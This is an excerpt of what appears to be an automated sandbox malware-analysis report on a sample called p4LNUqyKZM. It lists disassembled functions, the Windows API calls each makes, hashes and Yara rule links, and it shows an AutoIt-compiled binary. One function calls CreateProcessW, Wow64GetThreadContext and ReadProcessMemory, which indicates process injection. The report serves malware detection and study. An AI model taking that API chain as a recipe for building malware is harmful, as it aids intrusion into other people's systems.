                        Function 009F2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID: EA06
                        • API String ID: 2638373210-3962188686
                        • Opcode ID: 46f0d7e38552de842a05a1e758c33ea56f1a5cf3ff890760da14b5b26afff7f5
                        • Instruction ID: 7d9295e5fec15b953a35631a6d0328d12c529d256e99fa69d30fd9e80e319a4e
                        • Opcode Fuzzy Hash: 46f0d7e38552de842a05a1e758c33ea56f1a5cf3ff890760da14b5b26afff7f5
                        • Instruction Fuzzy Hash: 2901B5729042587EDF18C7A8C856FFEBBF8DB46301F00455AF152D2181E5B8E6088BA0
                        Function 00983837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                        Download Yara Rule
                        APIs
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00983908
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconNotifyShell_
                        • String ID:
                        • API String ID: 1144537725-0
                        • Opcode ID: 00df1ed409dcfb5bcdb84e95dcdca567a2791c60ed843d82569fb48e8d049375
                        • Instruction ID: bbcd000016774f0c8e0e2ed2095e7fdd57e682895aa0eec1e283f29b8ca0828b
                        • Opcode Fuzzy Hash: 00df1ed409dcfb5bcdb84e95dcdca567a2791c60ed843d82569fb48e8d049375
                        • Instruction Fuzzy Hash: 8831B470A04301DFD760EF64D894BA7BBE8FB49719F00492EF99A87350E771AA44CB52
                        Function 00985745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 00985773
                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 009C4052
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 1bc4413bf270cf6ca913c745f062503fc6e8ecf9bc972d32bddf1cce2ba8fdb3
                        • Instruction ID: 049f481e522462ef610982effd7e2963cbe2e27f67b339bf88e3d1c5439d9fcb
                        • Opcode Fuzzy Hash: 1bc4413bf270cf6ca913c745f062503fc6e8ecf9bc972d32bddf1cce2ba8fdb3
                        • Instruction Fuzzy Hash: E0019230285225B6E3305A6ACC0EFA77F98EF027B0F11C304BA9D6A1E0C7B45855CB90
                        Function 00986E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00989879,?,?,?), ref: 00986E33
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00989879,?,?,?), ref: 00986E69
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide
                        • String ID:
                        • API String ID: 626452242-0
                        • Opcode ID: 0e89d30ba686fdff5d599bb9a91c9a7a46b76893e3094b10c2f151e18c670c06
                        • Instruction ID: 881273b6437f3378af5c019a910de064305dee2fba2b8a062797c7552ddf42d1
                        • Opcode Fuzzy Hash: 0e89d30ba686fdff5d599bb9a91c9a7a46b76893e3094b10c2f151e18c670c06
                        • Instruction Fuzzy Hash: 5001F7753442007FEB18A7B9EC1BF7FBAADDBC5310F14413EB106DA2E2E960AD005620
                        Function 0098B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0098BB4E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID:
                        • API String ID: 1385522511-0
                        • Opcode ID: fc7944dde1176368261e37f3c570d97dd558b53741ae46ead8f5d78f733b32b8
                        • Instruction ID: b1162b4c47b6d32447966f3d8c9a8c278c78be63b8b4f38308b1b079d879a194
                        • Opcode Fuzzy Hash: fc7944dde1176368261e37f3c570d97dd558b53741ae46ead8f5d78f733b32b8
                        • Instruction Fuzzy Hash: 1532DC34A00209AFDB24EF54C894BBEB7B9FF85314F18805AE915AB361D778ED41CB91
                        Function 0096129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00961A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00961AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00961B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                        • Instruction ID: 2df4fcb5eefb26350e55948115ab85092107fd81b23907310716dd7d00e09faa
                        • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                        • Instruction Fuzzy Hash: CB12BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                        Function 00984ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00984E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E9C
                          • Part of subcall function 00984E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984EAE
                          • Part of subcall function 00984E90: FreeLibrary.KERNEL32(00000000,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EC0
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EFD
                          • Part of subcall function 00984E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E62
                          • Part of subcall function 00984E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984E74
                          • Part of subcall function 00984E59: FreeLibrary.KERNEL32(00000000,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E87
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Library$Load$AddressFreeProc
                        • String ID:
                        • API String ID: 2632591731-0
                        • Opcode ID: e00c20c97850801150b596cff49085407fe03ddcab957aadcb60b430eefa8d00
                        • Instruction ID: fdd935ad77349451ec21906c04491c87c74ba3cc31654ddd6806da11f85ab32c
                        • Opcode Fuzzy Hash: e00c20c97850801150b596cff49085407fe03ddcab957aadcb60b430eefa8d00
                        • Instruction Fuzzy Hash: CF11E732650206AACF14FF60DC02FAD77A5AF80714F10842DF582A62C1EE749E459B50
                        Function 009B8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __wsopen_s
                        • String ID:
                        • API String ID: 3347428461-0
                        • Opcode ID: 69dbeaed26da149f1845cfd379ea5715ed2376a06a3f96f0e537b1492878dac8
                        • Instruction ID: 8cb0ea9ef8a170c5551c631ad667aa191c4e1e4842039055595290f4e7242aec
                        • Opcode Fuzzy Hash: 69dbeaed26da149f1845cfd379ea5715ed2376a06a3f96f0e537b1492878dac8
                        • Instruction Fuzzy Hash: 7511187590420AAFCF05DF98EA41ADB7BF9EF48314F114059FC08AB312DA31DA11CBA5
                        Function 00989A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                        Download Yara Rule
                        APIs
                        • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0098543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00989A9C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: db75374a4870402ac6c40c697c61ae3308ae19b01ff137cfe960edfb412bd18f
                        • Instruction ID: 03b760dbd9a8ca5ea7f850dae06df70960c807f7f3ecf4969182751bb9c60762
                        • Opcode Fuzzy Hash: db75374a4870402ac6c40c697c61ae3308ae19b01ff137cfe960edfb412bd18f
                        • Instruction Fuzzy Hash: 15113631204705AFDB25DE09C880B76B7E9AB44764F18C42EE99B8AB51C770E945CB60
                        Function 009B5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009B4C7D: RtlAllocateHeap.NTDLL(00000008,00981129,00000000,?,009B2E29,00000001,00000364,?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?), ref: 009B4CBE
                        • _free.LIBCMT ref: 009B506C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                        • Instruction ID: a2a87843f5f14e4cf1fe50fe0d46bebc68806f06b30215e92c5899b76a7649ff
                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                        • Instruction Fuzzy Hash: 510126722047056BE3219F659881BDAFBEDFB89370F26091DE18893280EA30A805C6B4
                        Function 009AE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                        • Instruction ID: a3d938786b48cfaeaa409e091a625eef373685b00a642bf9704ccaeaf0d8a7fb
                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                        • Instruction Fuzzy Hash: F4F0F432511A14A6D6313A698D09B9B339C9FD3330F100F15F825921D2DB74E80186E9
                        Function 009B4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,00981129,00000000,?,009B2E29,00000001,00000364,?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?), ref: 009B4CBE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: f7be3ecd2128e477673d95c618e072c540dc19d6fbc48a86305b042af498fde8
                        • Instruction ID: b4060e2c1ba49087fc648489985eed1a55fb94d02fe61e9f1688ebce19f71bb7
                        • Opcode Fuzzy Hash: f7be3ecd2128e477673d95c618e072c540dc19d6fbc48a86305b042af498fde8
                        • Instruction Fuzzy Hash: 7DF0E03154222467DB215F619E05BD63F4CBF81F71F148121FC99D6183CA70DC0165D0
                        Function 009B3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 23cc9449971297e8d25b8cdd0b5f33dfcd344678a03fd4a08e3fd8bcc8a2f5a6
                        • Instruction ID: b957077506a8760dbd6bea0bdc8bdabe27d4ee5ca022974963f604cefe91c606
                        • Opcode Fuzzy Hash: 23cc9449971297e8d25b8cdd0b5f33dfcd344678a03fd4a08e3fd8bcc8a2f5a6
                        • Instruction Fuzzy Hash: A6E02231140224AAE731AABB9E00BDB375CBFC37B0F168134BC1596890DB60DE0282E3
                        Function 00984F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(?,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984F6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 6d6e4d2fe1d7190a4e0a5dca732cb40a4f995c57c1188cc12b831a41c5fa592e
                        • Instruction ID: 996e711f67bbe7b69e4a09beafcfb05558bae50e45fd8819aee9d262b18d38d9
                        • Opcode Fuzzy Hash: 6d6e4d2fe1d7190a4e0a5dca732cb40a4f995c57c1188cc12b831a41c5fa592e
                        • Instruction Fuzzy Hash: CDF03971105752CFDB34AF64D490822BBE8BF143293258E7EE2EA82621C7359844DF50
                        Function 00982DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00982DC4
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LongNamePath_wcslen
                        • String ID:
                        • API String ID: 541455249-0
                        • Opcode ID: 1adaa06706fd866097f78b2e13228b3bbf3f71ca3f947496904887bdc26b6ff4
                        • Instruction ID: fa9223afe8a31a1a2caa3765c8e28cd49e60d49f705c0c7a5b09eb89c1fcbf82
                        • Opcode Fuzzy Hash: 1adaa06706fd866097f78b2e13228b3bbf3f71ca3f947496904887bdc26b6ff4
                        • Instruction Fuzzy Hash: 98E0CD76A042245BC710E2989C05FDA77DDDFC8790F044075FD09D7248DA70ED808651
                        Function 009F2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID:
                        • API String ID: 2638373210-0
                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                        • Instruction ID: b5a78397b752041097fd6734d4d3a7eaee7711e5724fe50676232ece44177891
                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                        • Instruction Fuzzy Hash: 4DE04FB0609B005FDF399B28A8517B677E89F4A300F00086EF69BC2252E57268458B4D
                        Function 00982B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00983837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00983908
                          • Part of subcall function 0098D730: GetInputState.USER32 ref: 0098D807
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00982B6B
                          • Part of subcall function 009830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0098314E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                        • String ID:
                        • API String ID: 3667716007-0
                        • Opcode ID: 53c58d0a01e123f1f0d23e5fcae4a102d54f0366b5ae6f0d077f3d855514e695
                        • Instruction ID: 40d59838b33a74add9b3bc1da2055efa313ee741ed1c1ce284aa3a87854bec91
                        • Opcode Fuzzy Hash: 53c58d0a01e123f1f0d23e5fcae4a102d54f0366b5ae6f0d077f3d855514e695
                        • Instruction Fuzzy Hash: 2CE0866230524406CA04BB74A8527BDE7599BD1756F40553EF546873E2CE24494A4352
                        Function 009C039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(00000000,00000000,?,009C0704,?,?,00000000,?,009C0704,00000000,0000000C), ref: 009C03B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 27524e543146922a14432c5bfa0f4f0c61e9ec28acc41a0add54b95ea6af45cd
                        • Instruction ID: cda965eeefde909c94b4dd55601576e35279055284fed9f5403a1474e3f162f9
                        • Opcode Fuzzy Hash: 27524e543146922a14432c5bfa0f4f0c61e9ec28acc41a0add54b95ea6af45cd
                        • Instruction Fuzzy Hash: FDD06C3208010DBBDF028F84DD06EDA3BAAFB48714F018100BE1856020C732E822AB90
                        Function 00981CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                        Download Yara Rule
                        APIs
